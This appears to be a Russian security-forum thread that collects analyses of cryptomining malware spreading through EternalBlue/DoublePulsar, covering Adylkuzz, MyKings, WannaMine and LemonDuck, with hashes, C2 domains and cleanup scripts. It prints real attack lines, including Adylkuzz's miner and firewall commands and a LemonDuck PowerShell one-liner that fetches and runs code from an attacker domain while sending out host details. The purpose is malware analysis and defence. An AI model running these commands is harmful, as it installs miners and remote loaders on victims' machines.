Майнеры криптовалют используют EternalBlue/DoublePulsar
Шифровальщик WannaCry (он же Wana Decrypt0r, WCry, WannaCrypt0r и WannaCrypt), как оказалось, был отнюдь не единственной малварью, которая эксплуатировала уязвимость в SMB и использовала похищенные у АНБ эксплоиты ETERNALBLUE и DOUBLEPULSAR.
Специалисты компании Proofpoint обнаружили криптовалютный майнер Adylkuzz , который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.
Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.
Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.
После успешной эксплуатации через EternalBlue машины заражаются DoublePulsar. Затем бэкдор DoublePulsar загружает и запускает Adylkuzz с другого хоста. После запуска Adylkuzz сначала остановит все потенциальные уже запущенные экземпляры и заблокирует обмен данными по протоколу SMB, чтобы избежать дальнейшего заражения. Затем он определяет общедоступный IP-адрес жертвы и загружает инструкции по майнингу, криптомайнер и инструменты очистки.
Похоже, что в любой момент времени существует несколько серверов управления и контроля (C&C) Adylkuzz, на которых размещаются двоичные файлы криптомайнера и инструкции по майнингу.
Заключение
Как и кампания WannaCry на прошлой неделе, в этой атаке используются просочившиеся хакерские инструменты АНБ и исправленная уязвимость в сети Microsoft Windows. Кампания Adylkuzz фактически предшествует WannaCry на много дней. Для организаций, использующих устаревшие версии Windows или не внедривших исправление SMB, выпущенное Microsoft в прошлом месяце, компьютеры и серверы останутся уязвимыми для этого типа атак. Независимо от того, связаны ли они с программами-вымогателями, майнерами криптовалюты или любым другим типом вредоносного ПО, эти атаки потенциально могут быть весьма разрушительными и дорогостоящими. Две основные кампании уже использовали инструменты атаки и уязвимости; мы ожидаем, что другие последуют за ними, и рекомендуем организациям и частным лицам исправлять свои машины как можно скорее.
e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe
Bitcoin miner process
https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar
https://xakep.ru/2017/05/17/more-attacks-on-smb/
пример AdylKuzz в образе автозапуска:
===================
Специалисты компании Proofpoint обнаружили криптовалютный майнер Adylkuzz , который преимущественно занимается майнингом валюты Monero. По данным специалистов, малварь использует точно такой же механизм распространения, как и WannaCry: сканирует SMB-порты, применяет эксплоит ETERNALBLUE и заражает уязвимые системы без ведома пользователей, задействовав DOUBLEPULSAR.
On Friday, May 12, attackers spread a massive ransomware attack worldwide using the EternalBlue exploit to rapidly propagate the malware over corporate LANs and wireless networks. EternalBlue, originally exposed on April 14 as part of the Shadow Brokers dump of NSA hacking tools, leverages a vulnerability (MS17-010) in Microsoft Server Message Block (SMB) on TCP port 445 to discover vulnerable computers on a network and laterally spread malicious payloads of the attacker’s choice. This particular attack also appeared to use an NSA backdoor called DoublePulsar to actually install the ransomware known as WannaCry.
Более того, исследователи уверены, что вредоносная кампания Adylkuzz стартовала гораздо раньше WannaCry, как минимум 2 мая 2017 года, а возможно даже раньше – 24 апреля 2017 года. Adylkuzz не привлек к себе так много внимания, как нашумевший шифровальщик, по той простой причине, что заметить заражение в этом случае гораздо сложнее. Единственные «симптомы», на которые может обратить внимание пострадавший, это замедление работы ПК, так как майнер оттягивает на себя ресурсы системы.
Специалисты отмечают, что Adylkuzz в некотором роде защитил пострадавших от него пользователей от атак WannaCry.
После успешной эксплуатации через EternalBlue машины заражаются DoublePulsar. Затем бэкдор DoublePulsar загружает и запускает Adylkuzz с другого хоста. После запуска Adylkuzz сначала остановит все потенциальные уже запущенные экземпляры и заблокирует обмен данными по протоколу SMB, чтобы избежать дальнейшего заражения. Затем он определяет общедоступный IP-адрес жертвы и загружает инструкции по майнингу, криптомайнер и инструменты очистки.
Executed commands:
taskkill /f /im hdmanager.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
taskkill /f /im mmc.exe
sc stop WELM
sc delete WELM
netsh ipsec static add policy name=netbc
netsh ipsec static add filterlist name=block
netsh ipsec static add filteraction name=block action=block
netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
netsh ipsec static set policy name=netbc assign=y
C:\Windows\Fonts\wuauser.exe --server
C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1
C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log
taskkill /f /im msiexev.exe
netsh advfirewall firewall delete rule name="Chrome"
netsh advfirewall firewall delete rule name="Windriver"
netsh advfirewall firewall add rule name="Chrome" dir=in program="C:\Program Files\Google\Chrome\Application\chrome.txt" action=allow
netsh advfirewall firewall add rule name="Windriver" dir=in program="C:\Program Files\Hardware Driver Management\windriver.exe" action=allow
C:\Windows\445.bat
C:\Windows\system32\PING.EXE ping 127.0.0.1
net stop Windows32_Update
attrib +s +a +r +h wuauser.exe
C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb
C:\Windows\system32\net1 stop Windows32_Update
Похоже, что в любой момент времени существует несколько серверов управления и контроля (C&C) Adylkuzz, на которых размещаются двоичные файлы криптомайнера и инструкции по майнингу.
Заключение
Как и кампания WannaCry на прошлой неделе, в этой атаке используются просочившиеся хакерские инструменты АНБ и исправленная уязвимость в сети Microsoft Windows. Кампания Adylkuzz фактически предшествует WannaCry на много дней. Для организаций, использующих устаревшие версии Windows или не внедривших исправление SMB, выпущенное Microsoft в прошлом месяце, компьютеры и серверы останутся уязвимыми для этого типа атак. Независимо от того, связаны ли они с программами-вымогателями, майнерами криптовалюты или любым другим типом вредоносного ПО, эти атаки потенциально могут быть весьма разрушительными и дорогостоящими. Две основные кампании уже использовали инструменты атаки и уязвимости; мы ожидаем, что другие последуют за ними, и рекомендуем организациям и частным лицам исправлять свои машины как можно скорее.
e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe
Bitcoin miner process
https://www.proofpoint.com/us/blog\threat-insight/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar
https://xakep.ru/2017/05/17/more-attacks-on-smb/
пример AdylKuzz в образе автозапуска:
Полное имя C:\WINDOWS\PREFETCH\WUAUSER.EXE
Обнаруженные сигнатуры
Сигнатура Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23
Размер 207360 байт
Создан 26.04.2017 в 17:29:34
Изменен 26.04.2017 в 17:29:3
Доп. информация на момент обновления списка
SHA1 D84884B6B2018C2859638EE7ACB40ECDC642B324
MD5 B36BA9B358A2B85206CA5AB644021945
Ссылки на объект
Ссылка HKLM\System\CurrentControlSet\Services\WELM\ImagePath
ImagePath C:\Windows\Prefetch\wuauser.exe --server
WELM тип запуска: Авто (2)
Полное имя C:\WINDOWS\SECURITY\MSIEXEV.EXE
Обнаруженные сигнатуры
Сигнатура Trojan:Win32/Adylkuzz.A [Microsoft] (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-23
Размер 1233408 байт
Создан 27.04.2017 в 13:16:22
Изменен 27.04.2017 в 13:16:22
Доп. информация на момент обновления списка
SHA1 5B6BE3DE3143AAAFBE6A3B2FCDA778DF5A8989C3
MD5 B60F2EFACB26A2462B3D6E826F281AC4
===================
Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
Тэги темы:
Войдите или Зарегистрируйтесь чтобы комментировать.
Комментарии
Мы видим, что Mykings/Smominru/( BOOT.DarkGalaxy - по классификации ЛК )использует тот же прием, что и AdylKuzz, т.е. заразив систему, майнер закрывает «дырку» в SMB и не позволяет другой малвари воспользоваться брешью.
пример кода вC2.bat:
Дмитрий Кузнецов, автор Universal Virus Sniffer в новом выпуске uVS 4.0 добавил функцию обнаружения вредоносных скриптов, заражающих систему майнером через обработчики событий WMI:
Trend Micro добавил технический отчет по криптомайнерам, с использованием EternalBlue и WMI скрипта
Новая семейство вредоносных программ, обнаруженных под названием Coinminer, приводит к тому, что пользователи и фирмы безопасности имеют одинаковое множества проблем, которые трудно остановить или обнаруживать из-за комбинации различных уникальных особенностей.
Malware - CryptogUrnency Miner - использует ETERNALBLUE NSA для инфекции пострадавших и WMI (инструментария управления Windows Management) в качестве метода для запуска команд на зараженных системах.
Кроме того, Coinminer также работает в памяти (безтелые вредоносные программы) и использует несколько слоев командных и управляющих серверов для развертывания множества скриптов и компонентов, которые необходимо заражать жертвам.
Все это делают из них смертельную смесь функций, для необновленных машин и систем, работающих на антивирусных решениях, которые не справляются с новейшими методами инфекции.
bleepingcomputer.com
blog.trendmicro.com
MyKings: медленный, но неустанный рост ботнета
Вступление
Ботнет MyKings / DarkCloud / Smominru (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.
Основные выводы этого исследования заключаются в следующем:
* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.
* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.
Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.
Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.
В число наиболее инфицированных стран входили:
* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония
Процесс заражения
Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.
ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.
Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.
Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.
Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.
Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.
c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.
Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся
Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:
Правила межсетевого экрана
Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.
Обновление компонентов
Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:
Роль загружаемых файлов следующая:
• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
• s.txt: скрипт сбора информации
• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
• 2.txt: список URL-адресов для компонентов.
Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере
полный отчет здесь
Устойчивость
Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы
Буткит
Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.
Ключи автозапуска в реестре
В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.
Задачи по расписанию
Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
ok, Mysa, Mysa1, Mysa2 и Mysa3.
Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe
Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.
Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.
сценарии WMI
Третий метод использует фильтры WMI для установления исполнения.
c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:
Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).
Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.
Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:
Дополнительные три команды в сценарии WMI загружают еще три компонента:
Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.
Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:
В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz [23]) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.
полный отчет здесь
Как и его предшественники, WannaMine v4.0 использует эксплойт EternalBlue для распространения и компрометации уязвимых хостов. Его дизайн похож на WannaMine v3.0 в том, что он хранит двоичные файлы эксплойта EternalBlue в каталоге, расположенном в C: \ Windows; однако каталог в версии 4.0 был переименован в «NetworkDistribution». Вместо использования одного жестко заданного имени службы, такого как WannaMine v3.0, версия 4.0 будет случайным образом генерировать .dll и имя службы на основе списка жестко заданных строк. Это делается для того, чтобы поддерживать постоянство на хосте.
https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/
проблема была связана с отсутствием детекта на управляющую dll, которая загружалась как служба через легальный svchost.exe
HKLM\System\CurrentControlSet\Services\ApplicationTimeSystem\Parameters\ServiceDLL
C:\Windows\system32\ApplicationTimeSystem.dll
при новой перезагрузке могло быть изменено имя dll, которое генерировалось случайным образом + изменен хэш.
при запуске службы, через управляющую dll выполнялось сканирование по локальной сети, с возможностью дальнейшего горизонтального распространения майнера по локальной сети, с использованием эксплойтов и инструментов, полученных от shadow brokers через уязвимость MS-17-010.
Образец объекта этого анализа, разработанный командой INCIBE-CERT, представляет собой описание вредоносных компонент (артефактов) в Powershell, обнаруженный в системах.
Начальным образцом для этого исследования является многослойный, обфусцированный файл Powershell вектор входа которой во время первого заражения неизвестен. После анализа было установлено, что это вредоносное ПО из семейства WannaMine, чья основная цель - криптомайнинг (использование пораженных машин для майнинга криптовалюты), который пытается распространиться по зараженной сети.
Как мы увидим в ходе анализа, эта вредоносная программа состоит из нескольких компонент и имеет возможность извлекать учетные данные из уязвимых систем, используя Mimikatz, а также для эксплуатации уязвимости CVE-2017-01441, известной как EternalBlue. чтобы получить доступ к другим машинам в сети, где вы не можете сделать это с помощью учетных данных, полученных с помощью собственных механизмов удаленного выполнения в Windows. Атака частично безфайловая, чтобы обойти антивирус и программы сканирования, автоматизированный запуск в песочницах, так как используется через PowerShell, чтобы попытаться запустить все в объем памяти.
.1. Общая информация
В ходе анализа этой угрозы были извлечены различные артефакты, которые обобщены. следующий:
4.1.1. int6.ps1
Дроппер, который осуществляет первоначальное заражение на каждой из пораженных машин. Это стартовый файл для этого анализа:
Int6.ps1 MD5 3b8e4705bbc806b8e5962efe39a35f66
SHA1 601daafe2b7725a46520580fa18d0c1103af00f2
SHA256 88b7f7517d70ae282a17bff20382599566cc4ff14492f18158fd4a9285ef89ff
4.1.2. "Funs" Этот артефакт представляет собой сценарий PowerShell, который содержит множество вспомогательных функций, и функциональность бокового движения. Многие функции поступают из фреймворков, как Empire.
"Funs" MD5 b2de128c2f70dc74cc25680bc6ac9a94
SHA1 9739ff09665d32dd09a73c25fdbb3e4538ab26a0
SHA256 e27b534c2d296ce0e987bf3d0a0bb13a9d252c81b5ae7557e36368ba560c6f4f
4.1.3. «mimi»: Mimikatz Это двоичный файл Mimikatz, который выполняется путем отраженной инъекции, избегая таким образом, он записывается на диск и используется для получения учетных данных системы.
«mini» MD5 0367064d9585cc5c8b8eff127d9565d0
SHA1 784720bab9106e47c5b34d7f0fa12d1388fe1f9d
SHA256 d82889279c771f362f870a5f896fc435790cbd0b587e86efcd4164570ce12a72
4.1.4. «mon»: miner XMRig Это двоичный файл программного обеспечения XMRig3, майнера криптовалюты с открытым исходным кодом. популярны в атаках криптоджекинга.
Он работает в памяти с помощью PowerShell, поэтому что двоичный файл не записывается на диск.
"mon":
MD5 91ff884cff84cb44fb259f5caa30e066
SHA1 c68e4d9bc773cfef0c84c4a33d94f8217b12cb8b
SHA256 5a0ec41eb3f2473463b869c637aa93fac7d97faf0a8169bd828de07588bd2967
4.1.5. WinRing0x64.sys Этот артефакт является законным и подписанным драйвером, используемым майнером XMRig, который позволяет Это настроит регистры MSR5,6 для оптимизации производительности майнинга. Известно, что этот драйвер содержит уязвимости, которые позволяют эскалацию привилегии, хотя это не его роль во время атаки WannaMine.
WinRing0x64.sys
MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
4.1.6. mue.exe
Этот артефакт записывается на диск во время заражения, и его задача - инжектировать полезную нагрузку в легальный процесс.
Mue.exe
MD5 d1aed5a1726d278d521d320d082c3e1e
SHA1 efdb3916c2a21f75f1ad53b6c0ccdf90fde52e44 SHA256 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff
4.2. Эта угроза способна выполнять следующие действия:
Очистка системы
Чтобы удалить этот конкретный WannaMine из зараженной системы, вы можете запустить следуя сценарию PowerShell с правами администратора, и перезагрузите компьютер, когда закончите.
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding - Filter “__Path LIKE '%SCM Event8 Log Consumer%'’' | Remove-WmiObject Get-WMIObject -Namespace root\subscription -Class __EventFilter -filter “Name LIKE '%SCM Event8 Log Filter%'’' |Remove-WmiObject Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer - Filter ('Name like '%SCM Event8 Log Consumer%'') | Remove-WmiObject Get-WMIObject -Namespace root\default -List | where {$_.Name –eq 'systemcore_Updater8'} | Remove-WmiObject sc.exe stop WinRing0_1_2_0 sc.exe delete WinRing0_1_2_0 if ([System.IO.File]::Exists([environment]::SystemDirectory+‘\WindowsPowerShell\v1.0\Wi nRing0x64.sys’)) { echo (‘Borrando ‘+[environment]::SystemDirectory+‘+‘\WindowsPowerShell\v1.0\WinRing0x64.sys’) ; rm ([environment]::SystemDirectory\WindowsPowerShell\v1.0\WinRing0x64.sys) } if ([System.IO.File]::Exists([environment]::SystemDirectory+‘\drivers\WinRing0x64.sys’)) { echo (‘Borrando ‘+[environment]::SystemDirectory+‘+‘\drivers\WinRing0x64.sys’) ; rm ([environment]::SystemDirectory\drivers\WinRing0x64.sys) } if ([System.IO.File]::Exists([environment]::SystemDirectory+‘\mui.exe’)) { echo (‘Borrando ‘+[environment]::SystemDirectory+‘\mui.exe’) ; rm ([environment]::SystemDirectory\mue.exe) } if ([System.IO.File] :: Exists ($ env: WINDIR + ‘\ temp \ sysupdater0.bat’)) { echo «Borrando $ env: WINDIR \ temp \ sysupdater0.bat»; rm $ env: WINDIR \ temp \ sysupdater0.bat } if ([System.IO.File] :: Exists ($ env: WINDIR + ’\ 11.vbs’)) { echo «Borrando $ env: WINDIR \ 11.vbs»; rm $ env: WINDIR \ 11.vbs } if ([System.IO.File] :: Exists ($ env: WINDIR + ’\ info.vbs’)) { echo «Borrando $ env: WINDIR \ info.vbs»; rm $ env: WINDIR \ info.vbs } schtasks / DELETE / TN sysupdater0 / FХотя скрипт удаляет следы вредоносных программ из системы, рекомендуется продолжить изучение.
детальный анализ данного варианта так же есть здесь:
https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/
LemonDuck является одним из семейства вредоносных ПО для майнинга криптовалют
С момента своего первого появление в октябре 2019 года, вредоносная программа расширила свои возможности новым механизмом сохранения через WMI и новый боковой стратегией движения.
Некоторые из наиболее впечатляющих техник включают:
• Различные способы первоначального доступа (фишинговые письма, EternalBlue, RDP, SSH, учетные записи SQL)
Первоначальный доступ
Заражение системы во многом зависит от способности вредоносных скриптов к боковому перемещению. LemonDuck расширил исходную идею Kingminer для подбора учетных записей SQL Server и добавил больше возможностей для использования техник в свой арсенал. Заражение может начаться в системе несколькими способами:
Первым шагом, когда злоумышленники закрепляются на машине, является загрузка и выполнение сценария PowerShell из C2 сервер.
Существует два способа выполнения командной строки загрузчика в системе. Первый - это прямой способ вызов командной строки. Второй содержит дополнительный шаг в попытке остаться незамеченным путем регистрации пользовательского процесса CompMgmtLauncher.exe или ComputerDefaults.exe. Эта командная строка только используется один раз при запуске скрипта. После запуска одного из выбранных процессов скрипт удаляет ключ реестра, содержащие вредоносную командную строку:
Этот URL-адрес загрузки также сообщает злоумышленнику о заражении новой системы и содержит имя пользователя и имя машины в параметрах.
Далее скрипт подготавливает среду для выполнения следующих этапов и финальных полезных нагрузок. Во-первых, он удаляет все существующие AV из системы с помощью WMI. Затем для каждого доступного домена в переменной $ us регистрируется запланированная задача и получатель событий WMI с той же командой (хранится в $ tmps). Скрипт также помечает зараженные системы значком пустая запланированная задача с именем blackball и добавляет свой механизм сохранения, только если эта задача отсутствует. Наконец, сценарий подготавливает среду к боковому перемещению, добавляя правила брандмауэра для различных портов. Интересным действием на этом этапе является отказ в доступе к портам 445 и 135 на зараженных машинах.
Устойчивость
LemonDuck использует два метода для поддержания устойчивости. Злоумышленники позаботились с запасом; у них есть три домена (t.zz3r0[.]com, t.zer9g[.]com, t.amynx[.]com), где они разместили скрипты второго этапа. Таким образом, они регистрируют три команды с запланированными задачами и те же три команды с событием WMI и потребителями. Команды загружают и выполняют один и тот же сценарий. Запланированные задачи и потребители событий WMI удобны, когда дело доходит до безфайловых атак. Пример cmdline для периодического запуска:
“powershell” -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).”DownloadData”($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography. RSAParameters;$p.Modulus=[convert]::FromBase64String(‘2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef- 4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=’);$p.Exponent=0x01,0x- 00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$u rl=’http://’+’t.zz3’+’r0[.]com’;a($url+’/a.jsp?_20200807?’+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join’*’))Вторая стадия.
Командные строки, зарегистрированные на этапе устойчивости, скачивают и запускают скрипт второго этапа атаки. Второй этап начинается либо с svchost.exe процесс (для запланированных задач) или процесс scrcons.exe (для потребителей событий). Загруженный скрипт запутывается при загрузке в память, затем деобфускируется при запуске.
После деобфускации скрипт становится читаемым и состоит из трех отдельных частей.
Первая часть подготавливает среды для выполнения путем остановки уже запущенных полезных нагрузок и отключения Защитника Windows, и он собирает информация о системе, такая как имя компьютера, домен, версия ОС, текущие права пользователя и т. д.
Вторая часть загружает и запускает двоичные файлы m6.bin, m6g.bin, kr.bin, if.bin и nvd.zip с диска. Для этого он определяет некоторые вспомогательные функции и создает мьютексы, поэтому полезные данные запускаются только один раз за сеанс.
Третья часть - это загрузчик и исполнитель, который проверяет загруженные полезные данные с помощью функции SIEX и запускает их в памяти.
Полезные данные загружаются в память
Первый вызов SIEX отправляет собранную информацию злоумышленнику в виде параметров в URL-адресе. цель - уведомить злоумышленников об успешном заражении.
Второй вызов SIEX вызывает сценарий из домена злоумышленника в if_mail.bin.
Цель этого сценария powershell - отправить фишинговые сообщения электронной почты контактам Outlook текущего пользователя. Это порождает Файлы .rtf и .js в виде вложений, которые запустят вредоносный код на машине жертвы, если фишинг будет успешным.
Третий вызов SIEX получает сценарий Powershell, который загружает и выполняет новую полезную нагрузку. После загрузки в \ AppData \ Local \ Temp \, сценарий проверяет, соответствует ли MD5 файла жестко запрограммированному значению и создает задачу
If.bin - это большой файл размером 270 КБ, содержащий заархивированный сценарий Powershell. После деобфускации этот скрипт раскрывается как большой набор инструментов для эксплуатации / тестирования на проникновение или безопасности. инструменты аудита, в основном взятые из общедоступных источников и используемые для бокового смещения.
• Эксплуатация EternalBlue - использование сканера портов PingCastle [4] для обнаружения машин, отвечающих на порт 445 и затем запуск эксплуатации SMB
• RDB brute-forcing module
• USBLNK - способен заражать сетевые диски и съемные диски с файловыми системами FAT32 и NTFS. Создает .lnk файлы на этих дисках для выполнения кода.
•PowerDump [5] and Mimikatz to dump NTLM passwords, used in pass the hash attacks
#######################################powerdump written by David
Kennedy#########################################
• MS-SQL brute-forcing - scans IPs for ports 1433 and attempts to brute-force accounts, similar to Kingminer
write-host “start mssql port open scanning...”
•SSH brute-forcing
write-host “start ssh port open scanning...”
• Redis (Remote Dictionary Server) command execution - scans for ports 6379 and 16379 and then attempt to execute remote commands
• Yarn command execution - scans for port 8088 and attempts to execute remote commands
m6.bin он же. XMRig
Это версия XMRig, без информации о версии, но все же узнаваемая в IDA по заголовку окна и конфигурации json.
m6g.bin он же. XMRig Модуль PowerSploit [6] загружает двоичный блок данных, содержащийся в том же файле.
kr.bin aka. Kill Competition
Этот файл представляет собой сценарий PowerShell, который выполняет роль освобождения ресурсов в системе, останавливая фоновый режим, ненужные сервисы, и убивает конкурирующие майнерские процессы.
Заключение
Злоумышленники, стоящие за LemonDuck, усовершенствовали идеи, лежащие в основе KingMiner, и создали вредоносное ПО, которое может заразить много больше систем и гораздо эффективнее майнить криптовалюту.
https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf
В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.
после включение записи лога DNS стали известны целевые адреса:
далее, разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска: и
после декодирования строки: собственно, именно данный целевой адрес и детектировал антивирус:
10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
